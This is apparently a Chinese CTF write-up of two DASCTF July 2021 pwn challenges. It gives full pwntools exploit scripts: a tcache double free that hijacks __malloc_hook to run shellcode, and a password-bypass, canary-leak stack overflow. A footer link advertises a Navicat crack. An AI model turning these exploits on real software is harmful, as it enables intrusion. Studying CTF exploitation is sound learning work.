EasyHeap

想可执行的地方写入orw的shellcode,利用tcachebin的df进行劫持malloc_hook

然后调用add来触发。

from pwn import *

context.os = 'linux'

context.log_level = "debug"

context.arch = 'amd64'

p = process('./Easyheap', env={"LD_PRELOAD":'./libc-2.27.so'})

libc = ELF('./libc-2.27.so')

elf = ELF('./Easyheap')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

	gdb.attach(p)

	pause()

def add(size, con):

    sla(">> :\n", "1")

    sla("Size: \n", size)

    p.sendafter("Content: \n", con)

def delete(index):

    sla(">> :\n", "2")

    sla("Index:\n", str(index))

def show(index):

    sla(">> :\n", "3")

    sla("Index:\n", str(index))

def edit(index, con):

    sla(">> :\n", "4")

    sla("Index:\n", str(index))

    p.sendafter("Content:\n", con)

add(0x40,'bpc')

add(0x420,'bpc'*0x160)

add(0x40,'bpc')

add(0x40,'a'*0x40)

add(0x40,'bpc')

add(0x10,'bpc')

delete(1)

edit(0,'a'*0x20)

show(0)

ru(0x20*'a')

libcbase = uu64(r(6)) - 0x3EBCA0

leak('libcbase',libcbase)

malloc = libcbase + libc.sym['__malloc_hook']

mmap = 0x23330000

delete(3)

edit(2, 'a'*0x10+p64(0)+p64(0x51)+p64(mmap))

add(0x40,'a'*0x40)

add(0x40,'a'*0x40)

shellcode = shellcraft.open("flag")

shellcode += shellcraft.read(3, mmap+0x200, 0x50)

shellcode += shellcraft.write(1, mmap+0x200, 0x50)

shellcode = asm(shellcode)

edit(3, shellcode)

delete(5)

edit(4, 'a'*0x10+p64(0)+p64(0x21)+p64(malloc))

add(0x10,'bpc')

add(0x10,p64(mmap))

edit(6,p64(mmap))

add(0x20,'bpc')

#debug()

itr()

old_thing

第一关就是一个逆向,逆向出密码是啥

好叭,密码不太行emmm,直接学习网络上大佬00绕过的方法,利用password长须进行阶段,输入0x20的字符会将用于比较的s2开头的字符置为00所以此时我们需要构造md5后开头为00的字符串对,此时s1的开头也就是00,就可以绕过密码比较。利用下面的脚本进行爆破寻找这样的字符串对:(抄的)

import os

import hashlib

while True:

    md5 = hashlib.md5()

    key = os.urandom(0x20)

    md5.update(key)

    res = md5.hexdigest()

    if res[:2] == "00":

        print("find: ", res, key)

        break

绕过这个密码之后就是简单的栈溢出的叭

from pwn import *

context.os = 'linux'

context.log_level = "debug"

context.arch = 'amd64'

p = process('./canary3')#, env={"LD_PRELOAD":'./libc-2.27.so'})

#libc = ELF('./libc-2.27.so')

elf = ELF('./canary3')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

	gdb.attach(p)

	pause()

p.recvuntil("please input username: ")

p.send(b"admin")

p.recvuntil("please input password: ")

pad = b"b\x80\xfd\xfd[b'\xbb$U\xc6\x8fkw[^\x8a3\xb5h\xb4\xfb\xec\xfe\x15\x08\x85\x0e\x17\xb6y\xf3"

p.send(pad)

sla('3.exit\n',2)

p.sendlineafter('your input:\n','a'*0x18)

sla('3.exit\n',1)

ru('a'*0x18+'\n')

canary = uu64(r(7))*0x100

leak('canary',canary)

sla('3.exit\n',2)

pl = 'a'*0x1f

p.sendlineafter('your input:\n',pl)

sla('3.exit\n',1)

ru('a'*0x1f+'\n')

pie = uu64(r(6))-0x2530

leak('pie',pie)

system = pie+0x023AF

sla('3.exit\n',2)

pl = 'a'*0x18 + p64(canary) + 'a'*8 + p64(system)

p.sendlineafter('your input:\n',pl)

sla('3.exit\n',3)

#debug()

itr()

realNoOutput

[复现]2021DASCTF实战精英夏令营暨DASCTF July X CBCTF-PWN的更多相关文章

  1. Weblogic CVE-2020-2551漏洞复现&CS实战利用

    Weblogic CVE-2020-2551漏洞复现 Weblogic IIOP 反序列化 漏洞原理 https://www.anquanke.com/post/id/199227#h3-7 http ...

  2. .NET北京俱乐部,技术的饕餮盛宴,不枉此行

    在19年年尾,我们相约于.NET北京俱乐部 DNT精英论坛暨.NET北京俱乐部是由资深.NET专家和社区活跃分子发起的技术论坛,以“分享.成长.合作.共赢”为原则,致力于打造一个领先的技术分享平台和成 ...

  3. 生产环境实践:Cana实现MySQL到ES实时同步

    注:由于文章篇幅有限,完整文档可扫下面二维码免费获取,更有深受好评的大数据实战精英+架构师好课等着你. 速点链接加入高手战队:http://www.dajiangtai.com/course/112. ...

  4. 在线直播: .NET与物联网主流技术探秘 初识IoT!

    DNT精英论坛暨.NET北京俱乐部是由资深.NET专家和社区活跃分子发起的技术论坛,以“分享.成长.合作.共赢”为原则,致力于打造一个领先的技术分享平台和成长交流生态.本次活动由aelf赞助支持,刘洪 ...

  5. 逆向与反汇编实战(一)--PEiD分析复现

    1.准备 简介: PEiD(PE Identifier)是一款著名的查壳工具,其功能强大,几乎可以侦测出所有的壳,其数量已超过470 种PE 文档 的加壳类型和签名. 整个过程需要测试文件成品:htt ...

  6. 【Android编程实战】源码级免杀_Dex动态加载技术_Metasploit安卓载荷傀儡机代码复现

    /文章作者:MG193.7 CNBLOG博客ID:ALDYS4 QQ:3496925334/ 在读者阅读本文章前,建议先阅读笔者之前写的一篇对安卓载荷的分析文章 [逆向&编程实战]Metasp ...

  7. 【逆向&编程实战】Metasploit安卓载荷运行流程分析_复现meterpreter模块接管shell

    /QQ:3496925334 作者:MG193.7 CNBLOG博客号:ALDYS4 未经许可,禁止转载/ 关于metasploit的安卓模块,前几次的博客我已经写了相应的分析和工具 [Android ...

  8. GKCTF X DASCTF 2021_babycat复现学习

    17解的一道题,涉及到了java反序列化的知识,学习了. 看了下积分榜,如果做出来可能能进前20了哈哈哈,加油吧,这次就搞了两个misc签到,菜的扣脚. 打开后是个登录框,sign up提示不让注册, ...

  9. Metasploitable渗透测试实战——Windows漏洞 MS08-067复现

    Ms08-067 攻防环境: 攻击机:kali     ip:198.168.12.212 靶机:Window XP 未打过ms08-067补丁  ip:198.168.12.209

  10. 2017.7.15清北夏令营精英班Day1解题报告

    成绩: 预计分数:20+10+40 实际分数:100+10+40. 一百三十多人的比赛全场rand7还水了个鼠标+键盘 unbelievable! 考试题目链接: https://www.luogu. ...

随机推荐

  1. localStorage/sessionStorage/cookie

    html5本地存储主要有两种localStorage和sessionStorage        都是使用相同api,存入后都是字符串类型 localStorage和sessionStorage使用方 ...

  2. 访问远程服务-RPC 与 REST

    方法调用 所做的传递参数.传回结果都依赖于栈内存.所以Caller 调用者 Callee 被调用者应该同属一个进程,拥有相同的 栈内存, 进程间通信(Inter-Process Communicati ...

  3. Asp.Net Core中使用日志组件log4net

    我们在开发任何项目过程中,记录各种日志是太正常不过的事情.没有日志记录的项目,也不可能放心进入生产环境运行.因此日志的记录,是必须要做的. 在.NET开发中,log4net是个常用的日志组件.本文简单 ...

  4. Oracle 计划任务批量清理临时表实例

    昨天发现近一段时间,公司某oracle库数据泵方式备份比之前慢了很多,备份集大小并未增长太多.查看了下发现该用户下存在几十万张表. 一.问题分析 1.查看用户下面的表 select count(*) ...

  5. Vue路由跳转时定位到页面顶部

    代码如下: router.afterEach((to, from, next) => { document.body.scrollTop = 0; document.documentElemen ...

  6. adb 工具-原⽣安卓解决WiFi⽹络受限以及修改NTP服务

    安装包下载地址:https://developer.android.google.cn/studio/releases/platform-tools 注: adb kill-server    //结 ...

  7. pandas学习记要

    本文翻译自文章: Pandas Cheat Sheet - Python for Data Science,同时添加了部分注解. 对于数据科学家,无论是数据分析还是数据挖掘来说,Pandas是一个非常 ...

  8. 计蒜客(Stone Game)01背包

    题意:在集合中挑一些数,形成一个集合S,剩下的数形成另一个集合P,使得S>= P ,并且对于S中任意元素ai,S-ai<=P 问有多少种方案. 题目链接:https://nanti.jis ...

  9. 在 MAC 上 进行 iOS 的 Airtest 自动化测试(未完成)

    1. 用USB连接 iPhone 和 mac . 从 连接 https://github.com/AirtestProject/IOS-Tagent 下载iOS-Targent工程文件, 在左上角选择 ...

  10. NavicatPremium16破解!!!!!亲测可用!!!!!!!!!!!!!!!!!

    前言 Navicat premium是一款数据库管理工具,是一个可多重连线资料库的管理工具,它可以让你以单一程式同时连线到 MySQL.SQLite.Oracle 及 PostgreSQL 资料库,让 ...